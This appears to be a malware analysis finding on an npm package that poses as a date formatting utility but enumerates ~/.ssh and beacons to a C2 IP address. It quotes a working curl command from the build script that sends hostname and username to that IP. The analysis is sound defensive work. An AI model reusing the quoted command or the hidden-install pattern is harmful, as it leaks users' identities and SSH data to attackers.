Package advertises itself as 'a simple date formatting utility' (index.js is a 7-line formatDate export), but ships postinstall.js which enumerates the contents of the installer's ~/.ssh directory and POSTs the listing along with username and platform to https://124.221.154.135/post. The file's own comments explicitly describe the destination as a C2 server. In addition, package.json scripts.build runs curl -X POST --data "h=$(hostname)&u=$(whoami)" http://124.221.154.135/pre, sending installer hostname and login name in cleartext to the same bare IP. The description/contents mismatch (date-utility cover story shipping SSH enumeration + C2 beaconing) is the canonical supply-chain malware shape. Although postinstall.js is not currently wired into a lifecycle hook in this version (and build is not an auto-run lifecycle step), the file is named and structured to auto-execute the moment a postinstall hook is added, and any consumer running npm run build triggers the curl exfiltration. Intent is unambiguous; this is not a legitimate package.